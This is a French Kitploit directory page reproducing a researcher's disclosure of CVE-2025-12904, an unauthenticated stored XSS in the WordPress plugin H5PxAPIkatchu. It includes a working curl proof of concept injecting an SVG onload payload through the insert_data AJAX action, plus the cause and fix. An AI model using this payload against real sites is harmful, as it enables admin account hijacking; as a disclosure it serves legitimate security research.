Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
SNORDIAN-s-H5PxAPIkatchu-CVE-Report — Divulgation pour CVE-2025-12904 | Kitploit
Outils/GitHubGitHub/mooseloveti/snordian-s-h5pxapikatchu-cve-report
Analyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'Intrusion
GitHubmooseloveti/snordian-s-h5pxapikatchu-cve-report

SNORDIAN-s-H5PxAPIkatchu-CVE-Report

Divulgation pour CVE-2025-12904

Voir le dépôt
il y a 8 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

SNORDIAN's-H5PxAPIkatchu-CVE-Report

Divulgation pour CVE-2025-12904

CVE-2025-12904 - Vulnérabilité dans SNORDIAN's H5PxAPIkatchu

Ce dépôt divulgue une vulnérabilité découverte dans SNORDIAN's H5PxAPIkatchu <= 0.4.16, un plugin WordPress développé par otacke.

🛠 Version affectée

  • Produit: SNORDIAN's H5PxAPIkatchu
  • Version: v0.4.16
  • URL: https://wordpress.org/plugins/h5pxapikatchu/

🔒 CVE assigné

ID CVETypeComposantImpact
CVE-2025-12904Cross-Site Scripting stocké non authentifié via insert_dataclass-table-view.phpUn attaquant authentifié peut exécuter du JS

🧾 Description détaillée

CVE-2025-12904 — Cross-Site Scripting stocké non authentifié via insert_data

  • Composant affecté: page d'administration h5pxapikatchu
  • Vecteur d'attaque: Non authentifié via requête POST
  • Déclencheur: Un attaquant peut injecter des scripts malveillants dans l'interface d'administration en exploitant l'action insert_data pour stocker des scripts arbitraires.
root@kitploit:~
curl -i -X POST 'http://localhost:8080/wp-admin/admin-ajax.php' \
  --data-urlencode 'action=insert_data' \
  --data-urlencode 'xapi={
    "object":{"id":"http://localhost:8080/?id=2"},
    "result":{"response":"<svg onload=alert(1)>"}
  }'

※Si l'id dans l'objet n'existe pas, cela échouera.

  • Impact: Les scripts stockés peuvent être exécutés, posant un risque de préjudice grave tel que le détournement de compte.

❓Raison de la vulnérabilité

La fonction insert_data() n'effectuait aucune vérification de permissions, permettant à des entrées malveillantes d'être sauvegardées sans authentification. De plus, ces entrées étaient affichées sans échappement sur l'interface d'administration.

  • La fonction insert_data() utilise current_user_can pour empêcher l'exécution non autorisée.
  • En utilisant esc_html($value) au lieu de echo $value, vous pouvez empêcher l'exécution de XSS.

Un petit mot

Il a été très difficile de créer le PoC.

root@kitploit:~
--data-urlencode 'xapi={
    "object":{"id":"http://localhost:8080/?id=2"},
    "result":{"response":"<svg onload=alert(1)>"}
  }'

J'ai passé beaucoup de temps à reproduire cette partie. Je voudrais mieux maîtriser la commande curl. Et sinon ce plugin... tout va bien ? Surtout le nom, hein.

🔍 Découvreur

Nom: MooseLove
Rôle: Chercheur en sécurité indépendant / chasseur de bugs
Contact: Disponible sur demande


📚 Références

  • Produit: https://wordpress.org/plugins/h5pxapikatchu/

⚠️ Licence

Cet avis est fourni pour la sensibilisation à la sécurité publique. Libre à partager avec attribution.

Télécharger l’outil